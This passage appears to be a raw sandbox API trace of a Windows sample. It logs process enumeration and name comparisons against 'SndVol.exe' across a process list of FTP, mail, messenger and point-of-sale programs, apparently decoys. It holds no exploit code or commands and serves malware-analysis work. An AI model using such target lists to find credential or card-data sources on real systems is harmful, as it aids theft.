th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action.exe")) returned 1 [0143.139] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="action.exe", cchCount1=10, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.139] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="breakfind.exe")) returned 1 [0143.140] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="breakfind.exe", cchCount1=13, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.140] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich_clear_garden.exe")) returned 1 [0143.141] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="rich_clear_garden.exe", cchCount1=21, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.141] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="legal_dog.exe")) returned 1 [0143.142] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="legal_dog.exe", cchCount1=13, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.142] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dogpasslikely.exe")) returned 1 [0143.144] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="dogpasslikely.exe", cchCount1=17, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.144] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dead.exe")) returned 1 [0143.145] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="dead.exe", cchCount1=8, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.145] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="summer_born_fight.exe")) returned 1 [0143.147] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="summer_born_fight.exe", cchCount1=21, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.147] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="personalprovide.exe")) returned 1 [0143.148] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="personalprovide.exe", cchCount1=19, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.148] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="study.exe")) returned 1 [0143.150] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="study.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.150] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="anything.exe")) returned 1 [0143.152] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="anything.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.152] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="join.exe")) returned 1 [0143.153] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="join.exe", cchCount1=8, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.153] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="require-of.exe")) returned 1 [0143.155] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="require-of.exe", cchCount1=14, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.155] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="rate-thought.exe")) returned 1 [0143.156] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="rate-thought.exe", cchCount1=16, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.156] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="green_physical_population.exe")) returned 1 [0143.157] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="green_physical_population.exe", cchCount1=29, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.157] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="few_loss_million.exe")) returned 1 [0143.158] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="few_loss_million.exe", cchCount1=20, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.158] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0143.159] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="3dftp.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.159] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0143.161] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="absolutetelnet.exe", cchCount1=18, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.161] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0143.162] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="alftp.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.162] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0143.163] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="barca.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.163] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0143.164] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="bitkinex.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.164] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0143.166] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="coreftp.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.166] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0143.168] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="far.exe", cchCount1=7, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.168] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0143.170] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="filezilla.exe", cchCount1=13, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.170] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0143.171] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="flashfxp.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.171] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0143.173] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="fling.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.173] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0143.181] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="foxmailincmail.exe", cchCount1=18, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.181] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0143.183] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="gmailnotifierpro.exe", cchCount1=20, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.183] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0143.184] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="icq.exe", cchCount1=7, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.184] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0143.186] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="leechftp.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.186] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0143.188] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="ncftp.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.188] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0143.189] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="notepad.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.189] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0143.191] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="operamail.exe", cchCount1=13, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.191] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0143.193] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="outlook.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.193] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0143.195] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="pidgin.exe", cchCount1=10, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.195] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0143.197] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="scriptftp.exe", cchCount1=13, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.197] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0143.198] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="skype.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.198] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0143.200] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="smartftp.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.200] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0143.202] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="thunderbird.exe", cchCount1=15, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.202] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0143.204] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="trillian.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.204] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0143.206] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="webdrive.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.206] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0143.207] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="whatsapp.exe", cchCount1=12, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.207] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0143.209] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="winscp.exe", cchCount1=10, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.209] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0143.210] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="yahoomessenger.exe", cchCount1=18, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.210] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0143.212] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="active-charge.exe", cchCount1=17, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.212] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0143.213] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="accupos.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.213] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0143.215] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="afr38.exe", cchCount1=9, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.215] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0143.217] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="aldelo.exe", cchCount1=10, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.217] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0143.219] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="ccv_server.exe", cchCount1=14, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.219] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0143.220] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="centralcreditcard.exe", cchCount1=21, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.220] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0143.221] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="creditservice.exe", cchCount1=17, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.221] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0143.222] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="edcsvr.exe", cchCount1=10, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.223] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0143.224] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="fpos.exe", cchCount1=8, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.224] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0143.225] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="isspos.exe", cchCount1=10, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.225] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0143.227] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="mxslipstream.exe", cchCount1=16, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.227] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0143.229] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="omnipos.exe", cchCount1=11, lpString2="SndVol.exe", cchCount2=10) returned 1 [0143.229] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0143.230] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="spcwin.exe", cchCount1=10, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.230] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0143.232] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="spgagentservice.exe", cchCount1=19, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.232] Process32Next (in: hSnapshot=0x650, lppe=0x416f5ec | out: lppe=0x416f5ec*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0143.233] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="utg2.exe", cchCount1=8, lpString2="SndVol.exe", cchCount2=10) returned 3 [0143.233] 